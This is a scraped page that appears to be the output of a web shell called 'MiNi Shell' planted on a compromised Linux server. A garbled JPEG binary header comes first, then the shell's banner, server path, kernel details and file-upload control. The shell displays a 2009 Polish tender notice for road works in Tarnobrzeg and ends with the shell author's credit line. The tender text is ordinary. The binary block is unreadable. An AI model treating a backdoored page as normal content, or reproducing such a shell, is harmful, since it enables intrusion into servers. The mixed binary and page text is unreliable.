JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090508/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090508/139716-N-2009.html

<p class="kh_header"><b>Tarnobrzeg: Rozbudowa ulicy T. Kościuszki wraz z remontem ulic: Dominikańskiej, Dr Lilien i Szkolnej w Tarnobrzegu</b><br>
<b>Numer ogłoszenia: 139716 - 2009; data zamieszczenia: 08.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Tarnobrzega , ul. Kościuszki 32, 39-400 Tarnobrzeg, woj. podkarpackie, tel. 015 8226570, faks 015 8222504.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tarnobrzeg.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa ulicy T. Kościuszki wraz z remontem ulic: Dominikańskiej, Dr Lilien i Szkolnej w Tarnobrzegu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	   Przedmiot zamówienia obejmuje wykonanie robót budowlano - remontowych                   w całym zakresie wydanym w dokumentacji projektowej pn. Rozbudowa ulicy Kościuszki wraz z remontem ulic: Dominikańskiej, Dr Lilien i Szkolnej                              w Tarnobrzegu, opracowanej w 2008 roku przez FPH PROMA Maria Zawada.         W zakresie przedmiotu zamówienia jest również opracowanie dokumentacji powykonawczej w branży elektrycznej oraz usunięcie kolizji  z zielenią i likwidacja wszystkich kolizji z uzbrojeniem technicznym (podziemnym i nadziemnym), w tym kolizji nie przewidzianych w wyżej wymienionej dokumentacji projektowej                           a niezbędnych do usunięcia w celu realizacji inwestycji.
Roboty wykonywane będą na następujących odcinkach ulic:
- ulica T. Kościuszki - na odcinkach:  od ul. Mickiewicza do ulicy Sokolej i od Pl. Dr A. Surowieckiego do ulicy Dominikańskiej,
- ulica Dominikańska - na odcinku od ulicy T. Kościuszki do ronda w rejonie  skrzyżowania ulicy Dominikańskiej  z ulicą Sandomierską,
- ulica Dr Lilien - na całej długości ulicy liczącej około 60 m,
- ulica Szkolna  - na odcinku wyznaczonym w projekcie budowlanym, tj. od Pl. Bartosza Głowackiego do rejonu ulicy St. Jachowicza. 
        	      Łączna długość  rozbudowywanej ulicy T. Kościuszki i pozostałych ulic objętych
                  przedmiotem zamówienia  wynosi ca 0,99 km. 
 
2.	Szczegółowy opis przedmiotu zamówienia w zakresie poszczególnych branż:

A. BRANŻA DROGOWA: 
         wymiana krawężników i nawierzchni jezdni oraz chodników - z zastosowaniem kostki
         betonowej brukowej, budowa nowych chodników na odcinkach ulic wyznaczonych w
         projekcie budowlanym, remont istniejących zatok postojowych  i budowa nowych z
         zastosowaniem kostki betonowej brukowej, w ulicy bocznej Kościuszki wykonanie
         remontu drogi z zastosowaniem kostki betonowej brukowej  w tym wykonanie nowej
         podbudowy z kruszywa,  wykonanie korekty geometrii łuków na skrzyżowaniach ulicy T.
         Kościuszki z ulicami: Sokola, Szkolna, Dr Lilien , wykonanie oznakowań poziomych i
         pionowych, wykonanie poręczy ochronnych łańcuchowych, 
                                       
B. BRANŻA SANITARNA:
wykonanie kanalizacji deszczowej w rejonie ulicy T. Kościuszki - boczna oraz w pobliżu kościoła i klasztoru Dominikanów, wykonanie przykanalików i nowych studni z kręgów betonowych o średnicy 1200 mm na kanalizacji deszczowej (2 szt.) - zgodnie z dokumentacja techniczną, wymiana na nowe studzienek ściekowych ulicznych o średnicy 500 mm z osadnikiem i syfonem w ilości 26 szt., regulacja obudowy zasów wody (w tym 4 szt. wymiana na nowe) i zaworów gazowych, założenie rur ochronnych na istniejącym gazociągu, ułożenie odwodnienia liniowego w chodniku typ AKODREN pokrytego blachą,

C. BRANŻA TELETECHNICZNA:
likwidacja kolizji z sieciami telefonicznymi (napowietrznymi i podziemnymi), w tym budowa studni kablowych - 2 szt., budowa kanalizacji teletechnicznej (z wciągnięciem kabli) na odcinku około 30 m w rejonie skrzyżowania ulicy T. Kościuszki z ulica Szkolną, przestawienie istniejących słupów telefonicznych - 2 szt., zawieszenie kabla napowietrznego - 50 m.

D. BRANŻA ELEKTRYCZNA:

D.1. Zakres robót budowlano - remontowych i instalacyjnych:
a)	demontaż istniejących latarni oświetlenia ulicznego w ilości 17 szt.,
b)	montaż i stawianie nowych słupów oświetleniowych - łącznie 23 szt. (18 szt. + 5 szt.), z fundamentami i oprawami oświetleniowymi,
c)	przestawienie istniejących latarni oświetlenia ulicznego - 3 szt.,
d)	ułożenie rur osłonowych AROTA z PCW - w zależności od potrzeb wynikających z likwidacji kolizji z kablami elektroenergetycznymi, 
e)	przebudowa kabli nN oświetlenia ulicznego na odcinku stawiania (przestawiania) słupów oświetleniowych i likwidacji kolizji - zakres robót do wykonania należy uzgodnić z PGE Dystrybucja Rzeszów Sp. z o.o. Rejon Dystrybucji Energii ul. Szpitalna 3, 39 - 400 Tarnobrzeg,
f)	likwidacja kolizji z kablami elektroenergetycznymi, w tym wysokiego napięcia - zakres robót do wykonania należy uzgodnić z PGE Dystrybucja Rzeszów Sp. z o.o. Rejon Dystrybucji Energii ul. Szpitalna 3, 39 - 400 Tarnobrzeg,
g)	likwidacja kolizji z szafą do sterowania oświetlenia ulicznego - zakres robót do wykonania należy uzgodnić z PGE Dystrybucja Rzeszów Sp. z o.o. Rejon Dystrybucji Energii ul. Szpitalna 3, 39 - 400 Tarnobrzeg,
h)	wykonanie robót rozbiórkowych i ziemnych w całym zakresie dotyczącym branży elektrycznej,

D.2. Zakres  prac projektowych do wykonania: 
opracowanie dokumentacji powykonawczej i zatwierdzenie jej (uzgodnienie) z PGE Dystrybucja Rzeszów Sp. z o.o. Rejon Dystrybucji Energii ul. Szpitalna 3, 39 - 400 Tarnobrzeg.
E. ROBOTY Z INNYCH BRANŻ:
wycinka oraz karczowanie drzew i krzewów, plantowanie i humusowanie terenu wraz                          z obsianiem trawą, wykonanie ogrodzeń posesji wzdłuż nowych granic powstałych w  wyniku podziału nieruchomości położonych w rejonie skrzyżowania ulicy T. Kościuszki z ulicą Szkolną , ustawienie ławek parkowych - 10 szt.  (materiał Wykonawcy) - zgodnie z projektem budowlanym.

Szczegółowy zakres robót do wykonania obejmuje dokumentacja projektowa - zał. nr 6 do SIWZ. 

UWAGA:
- PRZEDMIAR ROBÓT STANOWIĄCY ZAŁĄCZNIK DO SIWZ JEST MATERIAŁEM POMOCNICZYM DLA POTRZEB PRZETARGU I NIE MOŻE BYĆ ANALIZOWANY W ODERWANIU OD DOKUMENTACJI PROJEKTOWEJ, ZASAD SZTUKI BUDOWLANEJ, ZALECEŃ PRODUCENTÓW, ZALECEŃ STOSOWANYCH SYSTEMÓW I SPECYFIKACJI TECHNICZNYCH,
- DOKUMENTACJĘ PROJEKTOWĄ NALEŻY ANALIZOWAĆ PO PRZEPROWADZONEJ WIZJI LOKALNEJ W TERENIE,
- W ODNIESIENIU DO ROBÓT W BRANŻY ELEKTRYCZNEJ, W SZCZEGÓLNOŚCI DOTYCZĄCYCH PRZEŁOŻENIA LUB ZABEZPIECZENIA KABLI ELEKTROENERGETYCZNYCH, PRZEŁOŻENIA KABLI OŚWIETLENIA ULICZNEGO, PRZESTAWIENIA SZAFY STEROWANIA OŚWIETLENIA ULICZNEGO - WSKAZANYM BYŁOBY, NA ETAPIE SKŁADANIA OFERTY, ZAKRES ROBÓT UZGODNIĆ Z PGE DYSTRYBUCJA RZESZÓW SP. Z O.O. REJON DYSTRYBUCJI ENERGII UL. SZPITALNA 3, 39 - 400 TARNOBRZEG.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.11.12.91-4, 45.11.27.10-5, 45.23.23.10-8, 45.23.24.00-6, 45.23.24.50-1, 45.23.32.21-4, 45.23.32.90-8, 45.23.31.50-5, 45.23.32.22-1, 45.23.31.20-6, 45.31.43.00-4, 45.31.61.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 45 000 zł / słownie: czterdzieści pięć tysięcy złotych/<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W postępowaniu mogą wziąć udział wykonawcy, którzy spełniają następujące warunki:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają  obowiązek posiadania takich uprawnień 
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia:
a)	w okresie ostatnich 5 lat przed wszczęciem postępowania o udzielenie zamówienia wykonali roboty budowlano - remontowe o podobnym charakterze do przedmiotu zamówienia a jeżeli okres prowadzenia działalności jest krótszy - wykonali w tym okresie co najmniej 1 robotę budowlaną w zakresie budowy, przebudowy lub remontu drogi o wartości min. 1 500 000 zł brutto oraz roboty związane z likwidacją kolizji z uzbrojeniem technicznym (podziemnym i nadziemnym) w szczególności dotyczącymi sieci elektroenergetycznych i teletechnicznych,
b)	posiadają co najmniej po 1 pracowniku z uprawnieniami dla poszczególnych branż objętych przedmiotem zamówienia. Kierownik budowy musi być członkiem Izby Inżynierów Budownictwa,
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
a) dysponują środkami finansowymi lub zdolnością kredytową w kwocie nie mniejszej od 500 000 zł,
 b) posiadają polisę ubezpieczeniową lub inny dokument ubezpieczenia potwierdzający, iż wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności,
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego,

2. Zamawiający dokona oceny spełniania warunków na podstawie złożonego oświadczenia i dokumentów opisanych w pkt VI specyfikacji istotnych warunków zamówienia,                wg formuły  spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełniania warunku posiadania uprawnień do wykonywania działalności lub czynności oraz nie podlegania wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych Wykonawca zobowiązany jest przedłożyć następujące oświadczenia i dokumenty:
a)	oświadczenie o spełnianiu warunków udziału w postępowaniu wg załączonego wzoru ( załącznik nr 3 do SIWZ),
b)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
c)	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne 
i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się                o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców                         w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
d)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 u.p.z.p., wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się 
o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców 
w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
e)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 u.p.z.p., wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich);
2. W celu potwierdzenia spełniania warunku posiadania niezbędnej wiedzy                                   i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi                 do wykonania zamówienia, Wykonawca zobowiązany jest przedłożyć następujące dokumenty:
a)	wykaz zamówień opisanych w pkt. V ppkt 1.2)a), który obejmuje okres ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - wyszczególnienie za ten okres zamówień zrealizowanych. W wykazie wykonanych zamówień  należy podać wartości przedmiotu zamówienia, dat realizacji oraz odbiorców - wzór stanowi załącznik nr 4 do SIWZ, poparty dokumentami świadczącymi o ich należytym wykonaniu. 
Wykazane w załączniku do oferty zamówienie lub zamówienia muszą być poparte dokumentami potwierdzającymi, że zlecone zamówienie(a) zostało(y) wykonane               z należytą starannością (np. referencje, protokoły odbioru przedmiotu umowy(ów).
b)	wykaz osób, które będą wykonywać zamówienie lub uczestniczyć                                  w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia - wzór stanowi załącznik nr 5 do SIWZ. Jeżeli w wykazie wykonawca wskazał osoby, którymi będzie dysponował winien przedłożyć pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.
      
W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie.

3. W celu potwierdzenia spełniania warunku znajdowania się w sytuacji ekonomicznej                i finansowej zapewniającej wykonanie zamówienia, Wykonawca zobowiązany                       jest przedłożyć następujące dokumenty:
a)	informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
b)	polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy                   w imieniu wszystkich wykazywać będą spełnianie tego warunku.
4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są do złożenia wraz z ofertą pełnomocnictwa do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wszelka korespondencja prowadzona będzie wyłącznie                       z pełnomocnikiem..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.tarnobrzeg.eobip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Tarnobrzeg
uk. Mickiewicza 7
39-400 Tarnobrzeg.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.06.2009 godzina 10:00, miejsce: Kancelaria Ogólna Urzędu Miasta Tarnobrzeg
ul. Mickiewicza 7
39-400 Tarnobrzeg.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com